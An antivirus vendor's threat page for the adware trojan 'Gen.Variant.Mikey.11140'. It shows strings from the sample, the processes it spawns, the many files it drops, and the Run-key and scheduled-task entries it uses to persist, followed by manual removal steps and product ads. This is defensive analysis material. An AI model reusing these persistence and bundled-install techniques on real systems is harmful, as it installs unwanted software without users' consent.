DotNetAppDomainManager.CManagedHost

BoxedAppSDK_AppDomainManager, Version=1.0.0.0, Culture=neutral, PublicKeyToken=ef07ce3257ee81c1

DotNetAppDomainManager.CAppDomainManager

>.config

",BoxedAppSDK_AttachMixedBitnessProcessHelper

Attempt to launch not executable file:

Unable to find appropriate template exe

comdlg32.dll

\dllhost.exe

image_nt_headers.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR].VirtualAddress and .Size both are 0, so this application is not a .net application; we are exiting now

nimage_nt_headers.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR].VirtualAddress and .Size both are not 0, so this application seems to be a .net application; we are executing mscoree.dll!_CorExeMain now

image_nt_headers.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR].Size =

image_nt_headers.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR] =

image_nt_headers.OptionalHeader.AddressOfEntryPoint is NULL, let's check if this application is .net

hh.exe

find.exe

help.exe

winver.exe

regsvr32.exe

dllhost.exe

ntvdm.exe

tcpsvcs.exe

mpr.dll

sxs.dll

Obtain a full version, purchase a license at hXXp://boxedapp.com/boxedappsdk/order.html

%s_%.8x_%.8x_%.8x

.config

3, 3, 5, 12

BoxedApp, BoxedApp SDK, BoxedApp Packer, BoxedApp.com and some others are trademarks (some of them are registered) of Softanics

BoxedAppSDK.dll

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):

BROWSE~2.EXE:2880
ins_geforce.exe:3108
ShopperPro.exe:2168
BrowserHelper.exe:140
sc.exe:2584
sc.exe:2864
sc.exe:2252
ins_shopperpro.exe:832
net1.exe:2808
net1.exe:3028
%original file name%.exe:464
%original file name%.exe:2404
%original file name%.exe:2680
%original file name%.exe:2692
%original file name%.exe:2388
ns19.tmp:2196
net.exe:2972
net.exe:2748
regsvr32.exe:2224
ins_sense.exe:3272
setup.exe:2504
setup.exe:2104
Rripitpko.exe:3324
find.exe:2308
tcpsvcs.exe:2312
Dazifrnw.exe:3296
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:

%Documents and Settings%\%current user%\Local Settings\Temp\nsf10.tmp\ocnhrp.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf10.tmp\zttbgqnw.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf10.tmp\Mllzbzxd.tmp (403320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf10.tmp\srlykcd.dll (2055 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf10.tmp\Dazifrnw.exe (4149303 bytes)
%WinDir%\Tasks\ShopperPro.job (2150 bytes)
%Documents and Settings%\All Users\Application Data\ShopperPro\config.json (487 bytes)
%Documents and Settings%\All Users\Application Data\ShopperPro\ShopperPro.dll (2321 bytes)
%Documents and Settings%\All Users\Application Data\ShopperPro\ShopperPro64.dll (3361 bytes)
%Program Files%\ShopperPro\config.json (487 bytes)
%Documents and Settings%\All Users\Application Data\ShopperPro\database1_0_0.ej (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\D1958.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\setup1.exe (77238 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\NK.lky (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\setup.exe (860771 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp (85755 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Install_26625\ins_sense.exe (126699 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Install_26625\ins_geforce.exe (135221 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Install_26625\ins_shopperpro.exe (28971 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Install_26625\bxsdk32.dll (2386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl12.tmp\webpq.dll (2058 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl12.tmp\Rripitpko.exe (3925933 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl12.tmp\Qjkrl.tmp (383232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl12.tmp\dafqxyyv.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl12.tmp\awmtbllb.dll (14 bytes)
%Program Files%\YTDownloader\libeay32.dll (25608 bytes)
%WinDir%\Tasks\YTDownloader.job (942 bytes)
%Program Files%\YTDownloader\rtmpdump.exe (14285 bytes)
%Program Files%\YTDownloader\YTDownloader.exe (44429 bytes)
%Program Files%\YTDownloader\DownloadAPI.dll (48390 bytes)
%Program Files%\YTDownloader\Unelevate.exe (2749 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspD.tmp\AccDownload.dll (9226 bytes)
%Program Files%\YTDownloader\BrowserHelper.exe (11054 bytes)
%Program Files%\YTDownloader\YTD-icon-128x128.png (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspD.tmp\nsExec.dll (6 bytes)
%Program Files%\YTDownloader\BrowserHelperSrv.exe (4232 bytes)
%Program Files%\YTDownloader\Updater.exe (17865 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspD.tmp\nsProcess.dll (4 bytes)
%Program Files%\YTDownloader\download_ani.gif (9 bytes)
%Program Files%\YTDownloader\DownloadHelper.exe (10764 bytes)
%Program Files%\YTDownloader\AniGIF.ocx (5635 bytes)
%Documents and Settings%\%current user%\Desktop\YTDownloader.lnk (1 bytes)
%Program Files%\YTDownloader\ssleay32.dll (4079 bytes)
%Program Files%\YTDownloader\convert_aniBW.gif (7 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\YTDownloader\YTDownloader.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspD.tmp\ns19.tmp (6 bytes)
%Program Files%\YTDownloader\sbmntr.sys (28 bytes)
%Program Files%\Common Files\System\SysMenu.dll (15206 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspD.tmp\System.dll (11 bytes)
%Program Files%\YTDownloader\YTDUninstall.exe (20452 bytes)
%Program Files%\YTDownloader\Download_completed.ico (1 bytes)
%Program Files%\YTDownloader\convert_ani.gif (765 bytes)
%Program Files%\YTDownloader\converter.exe (61479 bytes)
%WinDir%\Tasks\YTDownloaderUpd.job (912 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk5.tmp (158241 bytes)
%Program Files%\ShopperPro\Updater.exe (23936 bytes)
%Program Files%\ShopperPro\manifest.json (595 bytes)
%Program Files%\ShopperPro\database1_0_0.json (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\AccDownload.dll (9320 bytes)
%Documents and Settings%\All Users\Documents\ShopperPro\JsDriver\Config.xml (1 bytes)
%Program Files%\ShopperPro\SPRemove.exe (20416 bytes)
%Program Files%\ShopperPro\FireFox\chrome.manifest (113 bytes)
%Program Files%\ShopperPro\FireFox\content\overlay.xul (203 bytes)
%Program Files%\ShopperPro\JSDriver\jsdrv.exe (100378 bytes)
%Program Files%\ShopperPro\ShopperPro64.dll (18424 bytes)
%Program Files%\ShopperPro\JSDriver\jsdrv.sys (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\nsExec.dll (6 bytes)
%Program Files%\ShopperPro\ShopperPro.dll (15536 bytes)
%Program Files%\ShopperPro\FireFox\install.rdf (828 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\nsProcess.dll (4 bytes)
%Program Files%\ShopperPro\FireFox\content\overlay.js (13 bytes)
%Program Files%\ShopperPro\FireFox\content\shopperpro_128.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\ns8.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\jsdrv.exe (100378 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\MoreInfo.dll (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\System.dll (11 bytes)
%Program Files%\ShopperPro\ShopperPro.exe (33633 bytes)
%WinDir%\Tasks\ShopperProJSUpd.job (888 bytes)
%Program Files%\ShopperPro\database1_0_0.ej (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz18.tmp\tgexscxus.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz18.tmp\142359 (37493 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz18.tmp\System.dll (784 bytes)
%Program Files%\Sense\Uninstall.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz18.tmp\1910 (8360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz18.tmp\wpnlqeoc.dll (5 bytes)
%WinDir%\Tasks\88328397-9b53-4507-979d-3bf6c5e6551d-5.job (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz18.tmp\dafqxyyv.dll (11 bytes)
%Program Files%\Sense\88328397-9b53-4507-979d-3bf6c5e6551d-5.exe (7547 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz18.tmp\olhpwwsc.dll (30344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf17.tmp (529484 bytes)
%Program Files%\Sense\utils.exe (60608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz18.tmp\jbnixm.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz18.tmp\awmtbllb.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz18.tmp\uvftlpm.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB.tmp\D1958.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB.tmp\setup1.exe (229796 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB.tmp\NK.lky (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB.tmp\setup.exe (2555480 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspA.tmp (243453 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj15.tmp\ocnhrp.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj15.tmp\cealjwn.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj15.tmp\447976 (38383 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj15.tmp\kkemcrzt.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj15.tmp\enwkiwc.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj15.tmp\System.dll (784 bytes)
%Program Files%\Ge-Force\utils.exe (61614 bytes)
%Program Files%\Ge-Force\Uninstall.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp (574653 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj15.tmp\zttbgqnw.dll (14 bytes)
%Program Files%\Ge-Force\55db0f44-c101-47cd-8ede-099d17d7ae11-5.exe (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj15.tmp\tqymkwqem.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj15.tmp\zqpzc.dll (30344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj15.tmp\229635 (5656 bytes)
%WinDir%\Tasks\55db0f44-c101-47cd-8ede-099d17d7ae11-5.job (72 bytes)
Delete the following value(s) in the autorun key (How to Work with System Registry):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"YTDownloader" = "%Program Files%\YTDownloader\YTDownloader.exe /boot"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"YTDownloader" = "%Program Files%\YTDownloader\YTDownloader.exe /boot"
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Permalink

Back to the blog

e-mail

Google+

Twitter

Facebook

Gen.Variant.Mikey.11140_c6c5706dc5

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet

Gen.Variant.Mikey.11140_c6c5706dc5

E-mail

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet